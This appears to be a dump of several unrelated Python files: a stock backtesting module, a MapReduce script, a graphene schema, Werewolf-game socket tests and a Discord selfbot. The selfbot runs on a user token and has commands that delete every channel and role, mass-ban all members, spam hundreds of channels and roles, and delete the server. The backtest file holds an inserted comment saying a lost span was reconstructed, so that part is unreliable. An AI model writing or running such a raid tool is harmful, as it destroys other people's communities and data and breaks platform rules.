ori_df.index,ori_df.columns\r\n target_index,target_col = target_df.index,target_df.columns\r\n if target_col.equals(ori_col) == False:\r\n print('Notice: Columns are different')\r\n ori_df = self.TrimColumns(ori_df,target_df)\r\n\r\n if target_index.equals(ori_index) == True:\r\n print('Job already Done')\r\n return ori_df\r\n\r\n ori_np,target_np = ori_df.values,target_df.values\r\n result_np = np.full_like(target_np,np.nan)\r\n current_seat = 0\r\n ori_first_day = ori_index[0]\r\n ori_last_day = ori_index[-1]\r\n\r\n for i in range(len(target_index)):\r\n tar_d = target_index[i]\r\n if tar_d < ori_first_day:\r\n pass\r\n #print(tar_d,'Data not Found')\r\n elif tar_d == ori_first_day:\r\n 
result_np[i,:] = ori_np[0,:]\r\n elif tar_d > ori_last_day:\r\n result_np[i,:] = ori_np[-1,:]\r\n else: #that is, tar_d > ori_first_day\r\n for k in range(current_seat,len(ori_index)):\r\n #print(tar_d,ori_index[k])\r\n if tar_d == ori_index[k]:\r\n #print(tar_d,ori_index[k])\r\n current_seat = k-1\r\n result_np[i,:] = ori_np[k,:]\r\n break \r\n elif tar_d < ori_index[k]:\r\n #print(tar_d,ori_index[k])\r\n current_seat = k-1\r\n result_np[i,:] = ori_np[k-1,:]\r\n break \r\n result_df = self.TransNPtoOriDF(result_np,target_df)\r\n return result_df\r\n\r\n def MaxOfManyArray(self,candidate):\r\n res = np.maximum(candidate[0],candidate[1])\r\n for i in range(2,len(candidate)):\r\n res = np.maximum(res,candidate[i])\r\n return res\r\n\r\n def MinOfManyArray(self,candidate):\r\n res = np.minimum(candidate[0],candidate[1])\r\n for i in range(2,len(candidate)):\r\n res = np.minimum(res,candidate[i])\r\n return res\r\n\r\n def RisedaysRatio(self,df,period): \r\n rise = self.TransNPtoOriDF(np.where(df>0,1,0),df) \r\n dip = self.TransNPtoOriDF(np.where(df<0,1,0),df) \r\n period_rise = self.ColumnSum(rise,period) \r\n period_dip = self.ColumnSum(dip,period) \r\n return period_rise/(period_rise+period_dip) \r\n \r\n \r\nclass BacktestData(Operators,DrawPlotByTS):\r\n database={}\r\n def __init__(self):\r\n print('Initializing BacktestData...')\r\n self.path = './data/'\r\n self.cpath = './cache/'\r\n print(self.path)\r\n self.ImportData('ret')\r\n self.CheckRet('ret')\r\n self.ImportData('bm_ret')\r\n self.CheckRet('bm_ret')\r\n self.firms = self.database['ret'].columns\r\n print('Successfully Initializing BacktestData')\r\n \r\n def CheckRet(self,ret_df_name):\r\n check_ret = np.nanmean(abs(self.database[ret_df_name]),axis=1)[1]\r\n print(ret_df_name,check_ret)\r\n if check_ret > 0.5:\r\n decision = input('Unit of '+ret_df_name+' is Wrong, Convert it?(Y/N)')\r\n if decision == 'Y' or decision == 'y':\r\n self.database[ret_df_name] *= 0.01\r\n self.ExportData(ret_df_name)\r\n self.tickers = list(self.database['ret'].columns)\r\n\r\n def Import(self,df_name,folder_url,encoder):\r\n file_name = df_name+'.csv'\r\n datas = os.listdir(folder_url)\r\n if file_name not in datas:\r\n print('-Error:',file_name,' Not Found.')\r\n yes_or_no = input(\"Build an Empty File to Continue?(Y/N)\")\r\n if yes_or_no == 'Y' or yes_or_no == 'y':\r\n pd.DataFrame([[0.01],[0.01],[0.01]]).to_csv(folder_url+file_name)\r\n print('Successfully Build an Empty File to Continue!')\r\n else:\r\n print('Import Process Interupted.')\r\n return 0\r\n self.database[df_name]=pd.read_csv(folder_url+file_name,index_col=0,parse_dates=True,encoding=encoder)\r\n \r\n def ImportData(self,_df_name):\r\n try:\r\n self.Import(df_name=_df_name,folder_url=self.path,encoder='cp950')\r\n except:\r\n self.Import(df_name=_df_name,folder_url=self.path,encoder='utf-8')\r\n \r\n def ImportCache(self,_df_name):\r\n try:\r\n self.Import(df_name=_df_name,folder_url=self.cpath,encoder='cp950')\r\n except:\r\n self.Import(df_name=_df_name,folder_url=self.cpath,encoder='utf-8')\r\n \r\n def AddData(self,df,df_name):\r\n self.database[df_name] = df\r\n\r\n def ExportData(self,_df_name,_encoder='cp950'):\r\n self.Export(df_name=_df_name,folder_url=self.path,encoder=_encoder)\r\n\r\n def ExportCache(self,_df_name,_encoder='cp950'):\r\n self.Export(df_name=_df_name,folder_url=self.cpath,encoder=_encoder)\r\n \r\n def Export(self,df_name,folder_url,encoder):\r\n existing_files = os.listdir(folder_url)\r\n file_name = df_name+'.csv'\r\n 
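# write the cached frame back out as df_name + '.csv' under folder_url; existing_files is collected but not otherwise used here\r\n        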
self.database[df_name].to_csv(folder_url+file_name,encoding=encoder)\r\n \r\n def ShowDFList(self):\r\n df_key = list(self.database.keys())\r\n df_key.sort()\r\n return df_key\r\n\r\nclass CalculatePosition(BacktestData,Operators):\r\n def __init__(self):\r\n self._reference_df = self.database['ret']\r\n self.firms = self.database['ret'].columns\r\n \r\n def Multiply(self,pos_list): #Logic-'AND'\r\n res = pos_list[0].copy()\r\n for i in range(1,len(pos_list)):\r\n res *= pos_list[i]\r\n return res\r\n \r\n def SumUp(self,pos_list): #Logic-'OR' ,Can also be Used to combine Long/Short Position\r\n res = pos_list[0].copy()\r\n for i in range(1,len(pos_list)):\r\n res += pos_list[i]\r\n return res\r\n \r\n def Weight(self,pos,weight): #weight can be constant,df,np\r\n res = pos*weight\r\n return res\r\n \r\n def PickByDF(self,pos,pick_df,pick_howmany,descending=True):\r\n ndarr = self.TransDFtoNP(pos)\r\n res = np.full_like(ndarr,0)\r\n for i in range(len(ndarr)):\r\n exist_pos = list(np.where(ndarr[i]>0)[0])\r\n if len(exist_pos)>pick_howmany:\r\n sel = pick_df.iloc[i,exist_pos]\r\n sel_rank = sel[np.argsort(sel)]\r\n if descending == True:\r\n for j in range(1,pick_howmany+1):\r\n res[i,list(self.firms).index(sel_rank.index[-j])] = ndarr[i,list(self.firms).index(sel_rank.index[-j])]\r\n else:\r\n for j in range(pick_howmany):\r\n res[i,list(self.firms).index(sel_rank.index[j])] = ndarr[i,list(self.firms).index(sel_rank.index[j])]\r\n else:\r\n for j in exist_pos:\r\n res[i,j] = ndarr[i,j]\r\n return res\r\n\r\n def PickByRandom(self,pos,pick_howmany):\r\n ndarr = self.TransDFtoNP(pos)\r\n res = np.full_like(ndarr,0)\r\n for i in range(len(pos)):\r\n exist_pos = list(np.where(ndarr[i]>0)[0])\r\n if len(exist_pos)>pick_howmany:\r\n sel = rdn.sample(exist_pos,pick_howmany)\r\n for j in sel:\r\n res[i,j] = ndarr[i,j]\r\n else:\r\n for j in exist_pos:\r\n res[i,j] = ndarr[i,j]\r\n res = self.TransNPtoOriDF(res,pos)\r\n return res\r\n\r\n def Neutral(self,pos):\r\n pos_adj = np.nanmean(pos,axis=1)\r\n pos_adj = pd.DataFrame(pos_adj,index=pos.index)\r\n pos_adj = self.Extend1DTSto2D(pos_adj,pos)\r\n res = pos - pos_adj\r\n return res\r\n\r\n def SegNeutral(self,pos,segment_df):\r\n segment_np,pos_np = segment_df.values,pos.values\r\n seglist = set(list(segment_np[0,:]))\r\n res = np.full_like(pos,0,dtype=np.float)\r\n for seg in seglist:\r\n seg_pos = np.where(segment_np==seg,pos_np,np.nan)\r\n seg_pos = self.TransNPtoOriDF(seg_pos,pos)\r\n seg_pos_demean = self.Neutral(seg_pos)\r\n seg_pos_demean_masked = np.where(segment_np==seg,seg_pos_demean,0)\r\n res += seg_pos_demean_masked \r\n res = self.TransNPtoOriDF(res,pos)\r\n return res\r\n\r\n def Scale(self,pos):\r\n pos_adj = np.sum(abs(pos),axis = 1)\r\n for i in range(len(pos_adj)):\r\n if pos_adj[i] == 0:\r\n pos_adj[i] = 1\r\n pos_adj = np.tile(pos_adj,(len(self.firms),1)).T\r\n res = pos/pos_adj\r\n return res\r\n \r\n def Timing(self,pos,time_filter):\r\n res = pos * time_filter\r\n return res\r\n \r\n def AdjustFreq(self,pos,start,new_freq):\r\n res = self.TransDFtoNP(pos)\r\n for i in range(start,len(res),new_freq):\r\n for ii in range(1,new_freq):\r\n if i+ii < len(res):\r\n res[i+ii,] = res[i,]\r\n return res\r\n\r\n def MaxHoldingCap(self,pos,cap):\r\n res = self.TransDFtoNP(pos)\r\n res = np.where(res>cap,cap,res)\r\n res = self.TransNPtoOriDF(res,pos)\r\n return res\r\n\r\n def MinHoldingPeriod(self,pos,period): #Use this func before scaling and weighting!\r\n #print('Hint: Input boolin array into MinHoldingPeriod!')\r\n res = 
self.TransDFtoNP(pos)\r\n        for j in range(1,len(res[0])):\r\n            signals = [] #找出第一次出現訊號的位置\r\n            for i in range(len(res)):\r\n                if res[i,j] != 0 and res[i-1,j] == 0:\r\n                    signals.append(i)\r\n            for s in signals:\r\n                for p in range(1,period):\r\n                    if s+p<len(res):\r\n                        res[s+p,j] = res[s,j]\r\n        res = self.TransNPtoOriDF(res,pos)\r\n        return res\r\n\r\n    # NOTE: a span of the original file was lost to tag-stripping here; it most\r\n    # plausibly defined the backtest setup (fee_rate, able_position, able_return,\r\n    # able_bm_return, able_dates, piy, HowToUseIdleCash) referenced by the methods\r\n    # below. Only the tail of MinHoldingPeriod and the head of Winrate could be\r\n    # reconstructed with confidence.\r\n    def Winrate(self):\r\n        wins = 0\r\n        abs_wins = 0\r\n        for i in range(len(self.single_bm)):\r\n            if self.single_str.iloc[i,0] >= self.single_bm.iloc[i,0]:\r\n                wins += 1\r\n                if self.single_str.iloc[i,0] > 1:\r\n                    abs_wins += 1\r\n        winrate = wins/len(self.single_bm)\r\n        print('Winrate:','%s'% (np.round(100*winrate,2))+'%')\r\n        abs_winrate = abs_wins/len(self.single_bm)\r\n        print('ABS_Winrate:','%s'% (np.round(100*abs_winrate,2))+'%')\r\n\r\n    def Turnover(self):\r\n        print('Turnover Rate:','%s'% (np.round(100*np.mean(self.dif_position_rowsum),2))+'%')\r\n    \r\n    def CalculateReturn(self):\r\n        #print(self.alternative)\r\n        self.alternative_ret = self.HowToUseIdleCash(self.alternative)\r\n        self.daily_return = pd.DataFrame.sum(self.able_position * self.able_return,axis = 1,skipna=True) + (1-pd.DataFrame.sum(self.able_position,axis=1))*self.alternative_ret\r\n        self.daily_return = pd.DataFrame(self.daily_return,columns=['sum'])\r\n        self.dif_position = self.BwdChangeNumber(self.able_position)\r\n        self.dif_position = self.FillRowN(self.dif_position,fill_in_content=self.able_position,row_number=0)\r\n        self.dif_position_rowsum = abs(self.dif_position).sum(axis=1,skipna=True)\r\n        self.change_loss = pd.DataFrame(self.fee_rate * self.dif_position_rowsum,columns=['sum'])\r\n        #self.change_loss = pd.DataFrame((self.fee_rate * abs(self.dif_position)).sum(axis=1,skipna=True),columns=['sum'])\r\n        #print(change_loss.shape,daily_return.shape)\r\n    \r\n    def Compounding(self):\r\n        self.single_str = 1 + self.daily_return - self.change_loss\r\n        self.single_bm = 1 + self.able_bm_return\r\n        self.path_str = self.Compound(self.single_str,False)\r\n        self.path_str.index = self.able_dates[1:]\r\n        self.path_bm = self.Compound(self.single_bm,False)\r\n        self.path_bm.index = self.able_dates[1:]\r\n        #print(len(self.path_str),len(self.path_bm))\r\n    \r\n    def ExportPlot(self):\r\n        self.PlotLogPicture([\"allocation\",\"benchmark\"],self.piy,self.single_str['sum'],self.single_bm['bm']) #label,1年有幾期,單一日報酬df\r\n        self.PlotDrawdown([\"allocation\",\"benchmark\"],self.path_str['sum'],self.path_bm['bm']) #label,累積日報酬df\r\n    \r\n    def GetBasicInf(self):\r\n        self.Winrate()\r\n        self.Turnover()\r\n        self.cbi = self.CalculateBasicInformation(self.path_str['sum'],self.single_str['sum'],self.piy)\r\n        self.gbi_dict = {'Ret':self.cbi[0],'Std':self.cbi[1],'Sharpe':self.cbi[2],'DD':self.cbi[3],'RtoDD':self.cbi[4]}\r\n        return self.gbi_dict\r\n\r\n    def GetBasicInf_fast(self):\r\n        self.cbi = self.CalculateBasicInformationFast(self.path_str['sum'],self.single_str['sum'],self.piy)\r\n        self.gbi_dict = {'Ret':self.cbi[0],'Std':self.cbi[1],'Sharpe':self.cbi[2],'DD':self.cbi[3],'RtoDD':self.cbi[4]}\r\n        return self.gbi_dict\r\n    \r\n    def Go(self,fastmode):\r\n        if fastmode == False:\r\n            self.CalculateReturn()\r\n            self.Compounding()\r\n            self.finish = self.GetBasicInf()\r\n            print(self.finish)\r\n        elif fastmode == True:\r\n            self.CalculateReturn()\r\n            self.Compounding()\r\n            self.finish = self.GetBasicInf_fast()\r\n            #print(np.round(self.finish['Sharpe'],4))\r\n    \r\n    def CorrwithBM(self): \r\n        value = np.round(np.corrcoef(self.single_bm.values.flatten(),self.single_str.values.flatten())[0,1],4) \r\n        return value\r\n\r\n    def RetDistribution(self,bins=25):\r\n        strategy_ret = self.single_str.values\r\n        plt.hist(strategy_ret,bins)\r\n        plt.show()\r\n\r\n    def NumberOfHolding(self):\r\n        pos = self.able_position\r\n        long_or_short = 
np.where((pos>0)|(pos<0),1,0)\r\n res = np.sum(long_or_short,axis=1)\r\n res = pd.DataFrame(res,index=pos.index)\r\n return res\r\n\r\n def OutplayGraph(self):\r\n strategy_ret,bm_ret = self.path_str.values,self.path_bm.values\r\n div = pd.DataFrame((strategy_ret/bm_ret),index=self.path_str.index)\r\n plt.figure(figsize=(15,3))\r\n plt.plot(div)\r\n plt.yscale(\"log\")\r\n plt.show()\r\n\r\n def LargestPosition(self):\r\n pos,firm_ret = self.able_position,self.able_return\r\n most = np.max(pos,axis=1)\r\n firms,dates = pos.columns,pos.index\r\n position_np = pos.values\r\n firm_ret_np = firm_ret.values\r\n for i in range(len(most)):\r\n for j in range(len(firms)):\r\n if position_np[i,j] == most[i]:\r\n print(dates[i],firms[j],most[i],'/ Its return:',firm_ret_np[i,j])\r\n break\r\n\r\n def Receipt(self,start_date=0,end_date=0):\r\n pos = self.able_position\r\n pos_np,ret_np = self.TransDFtoNP(pos),self.able_return.values\r\n pos_index,pos_columns = pos.index,pos.columns\r\n if end_date == 0:\r\n end_date = len(pos_np)\r\n for i in range(start_date,end_date):\r\n print(pos_index[i])\r\n for j in range(len(pos_np[i])):\r\n if pos_np[i,j] > 0:\r\n print(pos_columns[j],np.round(ret_np[i,j],4))\r\n\r\n def WeekdayPerformance(self):\r\n res = [[],[],[],[],[]]\r\n for i in range(len(self.single_str)):\r\n wd = dt.datetime.weekday(self.single_str.index[i])\r\n ret = self.single_str.values[i][0]\r\n try:\r\n res[wd].append(ret)\r\n except:\r\n continue\r\n data = {'Mon':np.mean(res[0])-1,'Tue':np.mean(res[1])-1,'Wed':np.mean(res[2])-1,'Thu':np.mean(res[3])-1,'Fri':np.mean(res[4])-1}\r\n return data\r\n\r\n def ShowInfoOfSpecifiedStocks(self,condition,*database): #condition should be a boolean matrix that represents what you care about\r\n pos = self.pos_str_df\r\n trimmed_data = []\r\n for db in database:\r\n temp = self.TrimDF(ori_df=db,target_df=pos)\r\n trimmed_data.append(temp.values)\r\n position_np = pos.values\r\n firms,dates = pos.columns,pos.index\r\n for i in range(len(dates)):\r\n for j in range(len(firms)):\r\n if condition[i,j] == 1:\r\n print(dates[i],firms[j])\r\n for td in trimmed_data:\r\n print(td,td[i,j])\r\n\r\n def RollingTest(self,interval_length):\r\n strategy_ret = self.single_str['sum']\r\n bm_ret = self.single_bm['bm']\r\n period_in_year = self.piy\r\n\r\n for i in range(0,len(strategy_ret),interval_length):\r\n print('Period',i)\r\n switch = 0\r\n for ret in [strategy_ret,bm_ret]:\r\n if switch == 0:\r\n switch += 1\r\n print('Str:')\r\n else:\r\n print('Benchmark:')\r\n interval_ret = ret.iloc[i:i+interval_length]\r\n interval_path = self.Compound(interval_ret,False)\r\n cbi = self.CalculateBasicInformation(interval_path,interval_ret,period_in_year)\r\n print(cbi)\r\n\r\n def StatOfEachBet(self):\r\n pos,ret = self.able_position.values,self.able_return.values\r\n record = []\r\n for i in range(len(pos)):\r\n for j in range(len(pos[i])):\r\n if pos[i,j] > 0:\r\n record.append(ret[i,j])\r\n tstat = (m.sqrt(len(record))*np.nanmean(record)/(np.nanstd(record)))\r\n res = (np.nanmean(record),np.nanstd(record),len(record),tstat)\r\n #print(res)\r\n return res","sub_path":"BackTestModulePortable.py","file_name":"BackTestModulePortable.py","file_ext":"py","file_size_in_byte":42116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"177198906","text":"import MapReduce\nimport json\nimport sys\n\n\nmr = MapReduce.MapReduce()\n\n\ndef mapper(record):\n jenc = json.JSONEncoder()\n 
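# Emit each friendship pair under both orderings; a mutual friendship yields two\n # values per key, so keys with a single value (checked in the reducer) are asymmetric.\n 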
mr.emit_intermediate(jenc.encode((record[0], record[1])), 'bFriendOfA')\n mr.emit_intermediate(jenc.encode((record[1], record[0])), 'aFriendOfB')\n\ndef reducer(persons_pair, friendship_direction):\n if len(friendship_direction) == 1:\n pair = json.loads(persons_pair)\n mr.emit((pair[0], pair[1]))\n \n\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"Assignment 3/asymmetric_friendships.py","file_name":"asymmetric_friendships.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"289068211","text":"import discord, os, json, time\r\n\r\nfrom discord.ext import commands\r\n\r\nwith open('config.json') as f:\r\n config = json.load(f)\r\n\r\ntoken = config.get('token')\r\nprefix = config.get('prefix')\r\n\r\nbot = commands.Bot(description='Selfbot', command_prefix=prefix, self_bot=True)\r\nbot.remove_command('help')\r\n\r\n@bot.event\r\nasync def on_connect():\r\n print(f''' \r\n Connected and Ready for use!\r\n User: {bot.user.name},\r\n Prefix: {prefix}\r\n ''')\r\n\r\n@bot.event\r\nasync def on_message_edit(before, after):\r\n await bot.process_commands(after)\r\n\r\n@bot.command()\r\nasync def purge(ctx, amount: int):\r\n await ctx.message.delete()\r\n async for message in ctx.message.channel.history(limit=amount).filter(lambda m: m.author == bot.user).map(lambda m: m):\r\n try:\r\n await message.delete()\r\n except:\r\n pass\r\n\r\n@bot.command()\r\nasync def cls(ctx):\r\n os.system(\"cls\")\r\n await ctx.message.edit(content='done.')\r\n print(f''' \r\n Connected and Ready for use!\r\n User: {bot.user.name},\r\n Prefix: {prefix}\r\n ''')\r\n\r\n@bot.command()\r\nasync def destroy(ctx):\r\n await ctx.message.delete()\r\n x = input('New server name: ')\r\n x2 = input('New text channels name: ')\r\n x3 = input('New roles name: ')\r\n print(f'Changed Discord Server Name to: {x}, Creating channels with the name: {x2}, Creating roles with the name: {x3}')\r\n print('Destroyed:', ctx.guild.name)\r\n for channel in list(ctx.guild.channels):\r\n try:\r\n time.sleep(1)\r\n await channel.delete()\r\n except:\r\n pass\r\n for role in list(ctx.guild.roles):\r\n try:\r\n time.sleep(1)\r\n await role.delete()\r\n except:\r\n pass\r\n try:\r\n await ctx.guild.edit(\r\n name= x,\r\n description=\"Destroyed\",\r\n reason=\"why not.\",\r\n icon=None,\r\n banner=None\r\n )\r\n except:\r\n pass\r\n for _i in range(250):\r\n time.sleep(1)\r\n await ctx.guild.create_text_channel(name=x2)\r\n for _i in range(250):\r\n time.sleep(1)\r\n await ctx.guild.create_role(name=x3)\r\n\r\n@bot.command()\r\nasync def massban(ctx):\r\n await ctx.message.delete()\r\n print('Mass banning in:', ctx.guild.name)\r\n users = list(ctx.guild.members)\r\n for user in users:\r\n try:\r\n time.sleep(1)\r\n await user.ban(reason=\"destroy.\")\r\n except:\r\n pass\r\n\r\n@bot.command()\r\nasync def delete(ctx):\r\n await ctx.message.delete()\r\n reply = str(input(f'would you like to delete {ctx.guild.name} (y/n): ')).lower().strip()\r\n if reply[0] == 'y':\r\n await ctx.guild.delete()\r\n print(f'Deleted {ctx.guild.name}')\r\n return True\r\n if reply[0] == 'n':\r\n print(f'Didn\\'t delete {ctx.guild.name}')\r\n return False\r\n else:\r\n return yes_or_no(\"Uhhhh... 
please enter \")\r\n\r\n@bot.command()\r\nasync def spamchannels(ctx):\r\n await ctx.message.delete()\r\n x = input('Name of channels to spam?: ')\r\n print('Spamming channel creation in:', ctx.guild.name,'with the name:', x)\r\n for _i in range(250):\r\n try:\r\n time.sleep(1)\r\n await ctx.guild.create_text_channel(name= x)\r\n except:\r\n return\r\n\r\n@bot.command()\r\nasync def spamroles(ctx):\r\n await ctx.message.delete()\r\n x = input('Name of roles to spam?: ')\r\n print('Spamming role creation in:', ctx.guild.name,'with the name:', x)\r\n for _i in range(250):\r\n try:\r\n time.sleep(1)\r\n await ctx.guild.create_role(name= x)\r\n except:\r\n return\r\n\r\n@bot.command()\r\nasync def delchannels(ctx):\r\n await ctx.message.delete()\r\n print('Deleteing channels in:', ctx.guild.name)\r\n for channel in list(ctx.guild.channels):\r\n try:\r\n time.sleep(1)\r\n await channel.delete()\r\n except:\r\n return\r\n\r\n@bot.command()\r\nasync def delroles(ctx):\r\n await ctx.message.delete()\r\n print('Deleteing roles in:', ctx.guild.name)\r\n for role in list(ctx.guild.roles):\r\n try:\r\n time.sleep(1)\r\n await role.delete()\r\n except:\r\n pass\r\n\r\nbot.run(token, bot=False)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393710807","text":"def squared_sum_difference(number):\n ''' returns the difference between the square of the sum of the positive\n integers up to and the sum of the squares of the positive\n integers up to , it assumes that it is being passed an integer\n within reasonable bounds.\n Timings: n=100 ~30microseconds, n=1000 ~220microseconds\n n=20000 ~5miliseconds (half of total response time)\n n=3000000 900miliseconds'''\n squared_sum = sum = 0\n for i in xrange(1, number+1):\n sum += i\n squared_sum += i*i\n return sum*sum - squared_sum\n\n","sub_path":"difference/calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"181928344","text":"import graphene\n\nfrom django.contrib.auth import get_user_model\n\nfrom graphene_django.types import DjangoObjectType\n\nfrom lcdbar.api import models\n\nclass PaymentType(DjangoObjectType):\n class Meta:\n model = models.Payment\n\nclass ProductType(DjangoObjectType):\n class Meta:\n model = models.Product\n\nclass UserType(DjangoObjectType):\n class Meta:\n model = get_user_model()\n\nclass CreatePayment(graphene.Mutation):\n class Arguments:\n barcode = graphene.Int()\n pin = graphene.Int()\n\n # output fields\n payment = graphene.Field(lambda: PaymentType)\n\n def mutate(self, info, barcode, pin):\n payment = models.Payment.objects.create(barcode=barcode, pin=pin)\n return CreatePayment(payment=payment)\n\nclass CreateProduct(graphene.Mutation):\n class Arguments:\n name = graphene.String()\n quantity = graphene.Int()\n\n ok = graphene.Boolean()\n product = graphene.Field(lambda: ProductType)\n\n def mutate(self, info, name, quantity, avatar):\n product = models.Product.objects.create(name=name, quantity=quantity)\n ok = True\n return CreateProduct(product=product, ok=ok)\n\nclass Mutations(graphene.ObjectType):\n create_product = CreateProduct.Field()\n create_payment = 
CreatePayment.Field()\n","sub_path":"lcdbar/api/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"116003322","text":"from . import WWTesting\nfrom apps.games.models import Game, Player, Role, Vote\nfrom apps.users.models import User\n\nimport json\n\nclass SocketTests(WWTesting):\n\n def test_login(self):\n username = \"TestUser1\"\n password = \"password\"\n self.socketio.emit('login', {\n \"username\": username,\n \"password\": password,\n })\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n assert username in latest_response['user']['username']\n\n def test_game_create(self):\n user_id = 1\n self.socketio.emit('create_game', {\n \"user_id\": user_id,\n \"public\": True,\n\n })\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n assert latest_response['game']['creator']['id'] == user_id\n assert len(latest_response['game']['players']) == 1\n assert latest_response['game']['players'][0]['user']['id'] == user_id\n\n def test_vote(self):\n voter_id = 1\n choice_id = 5\n self.socketio.connect()\n self.socketio.emit('set_vote',{\n \"voter_id\": voter_id,\n \"choice_id\": choice_id,\n });\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n assert latest_response['game']['players'][choice_id - 1]['id'] == choice_id\n assert latest_response['game']['players'][choice_id -1]['votes']['default'] == 1\n assert 'werewolf' not in latest_response['game']['players'][4]['votes']\n assert len(latest_response['game']['players'][3]['votes']) == 0\n\n def test_special_vote(self):\n voter_id = 1\n choice_id = 5\n role_id = 1\n role_name = \"Werewolf\"\n self.socketio.connect()\n self.socketio.emit('set_vote',{\n \"voter_id\": voter_id,\n \"choice_id\": choice_id,\n \"role_id\": role_id,\n });\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n assert latest_response['game']['players'][choice_id - 1]['id'] == choice_id\n assert latest_response['game']['players'][choice_id -1]['votes'][role_name] == 1\n assert 'werewolf' not in latest_response['game']['players'][4]['votes']\n assert len(latest_response['game']['players'][3]['votes']) == 0\n\n def vote_full_turn(self, villager_target, ww_target, seer_target):\n self.socketio.connect()\n game = self.db.session.query(Game).filter_by(code=\"TESTCODE\").join(Player).first()\n players = self.db.session.query(Player).filter_by(game=game).join(Role).all()\n player_set = []\n for player in players:\n player_set.append({\n \"voter_id\" : player.id,\n \"role_id\" : player.role.id,\n \"role_name\" : player.role.name\n })\n for counter, player in enumerate(player_set):\n self.socketio.emit('set_vote',{\n \"voter_id\": player[\"voter_id\"],\n \"choice_id\": villager_target,\n });\n if player[\"role_name\"] == \"Werewolf\":\n self.socketio.emit('set_vote',{\n \"voter_id\": player[\"voter_id\"],\n \"choice_id\": ww_target,\n \"role_id\": player[\"role_id\"],\n });\n if player[\"role_name\"] == \"Seer\":\n self.socketio.emit('set_vote',{\n \"voter_id\": player[\"voter_id\"],\n \"choice_id\": seer_target,\n \"role_id\": player[\"role_id\"],\n });\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n #print(\"test_vote_full_turn\\n\", json.dumps(latest_response, sort_keys=True, indent=4, separators=(',', ': ')))\n return latest_response\n\n def test_first_turn(self):\n 
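# Drive one complete voting round and check that each faction's vote landed on\n # its intended target and that the game advanced to turn 2.\n 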
villager_target = 1\n ww_target = 6\n seer_target = 5\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert response['votes']['default']['user']['id'] == villager_target\n assert response['votes']['Werewolf']['user']['id'] == ww_target\n assert response['votes']['Seer']['user']['id'] == seer_target\n assert response['game']['current_turn'] == 2\n\n def test_werewolves_win(self):\n villager_target = 9\n ww_target = 8\n seer_target = 1\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert response['votes']['default']['user']['id'] == villager_target\n assert response['votes']['Werewolf']['user']['id'] == ww_target\n assert response['votes']['Seer']['user']['id'] == seer_target\n assert response['game']['current_turn'] == 2\n villager_target = 7\n ww_target = 6\n seer_target = 2\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert response['votes']['default']['user']['id'] == villager_target\n assert response['votes']['Werewolf']['user']['id'] == ww_target\n assert response['votes']['Seer']['user']['id'] == seer_target\n assert response['game']['current_turn'] == 3\n villager_target = 5\n ww_target = 4\n seer_target = 2\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert response['game']['current_turn'] == 4\n assert \"evil\" in response['winner']\n\n def test_villagers_win(self):\n villager_target = 1\n ww_target = 2 #Werewolf suicide\n seer_target = 5\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert \"good\" in response['winner']\n assert response['game']['current_turn'] == 2\n\n\n def test_add_user(self):\n game_id = 1\n user_id = 12\n expected_user = User.query.get(user_id).username\n self.socketio.connect()\n self.socketio.emit('add_player',\n {\n \"game_id\": game_id,\n \"user_id\": user_id,\n })\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]['game']\n assert len(latest_response['players']) == 11\n assert expected_user in latest_response['players'][-1]['user']['username']\n\n def test_assign_roles(self):\n game_id = 1\n self.socketio.emit('assign_roles', {\"game_id\": game_id})\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]['game']\n #Need more thorough checks\n assert len(latest_response['players']) == 10\n\n def test_player_quit(self):\n game_id = 1\n game = Game.query.get(game_id)\n player = game.players.first()\n player_id = player.id\n self.socketio.connect()\n self.socketio.emit('quit_player', {\"player_id\": player_id})\n response = self.socketio.get_received()\n quitter = response[-1]['args'][0]['quitter']\n assert quitter['alive'] is not True\n assert quitter['id'] == player_id\n\n def test_admin_set_role(self):\n admin_id = 1\n game_id = 1\n role_id = 3 #Seer\n game = Game.query.get(game_id)\n player = game.players.first()\n player_id = player.id\n self.socketio.connect()\n self.socketio.emit('admin_set_role', {\n \"admin_id\": admin_id,\n \"password\": \"password\",\n \"player_id\": player_id,\n \"role_id\": role_id,\n })\n response = self.socketio.get_received()\n player = response[-1]['args'][0]['player']\n assert player['role']['id'] == role_id\n new_role_id = 1\n self.socketio.emit('admin_set_role', {\n \"admin_id\": admin_id,\n \"password\": \"password\",\n \"player_id\": player_id,\n \"role_id\": new_role_id,\n })\n response = self.socketio.get_received()\n player = response[-1]['args'][0]['player']\n assert player['role']['id'] == 
new_role_id\n","sub_path":"server/testing/sockets.py","file_name":"sockets.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
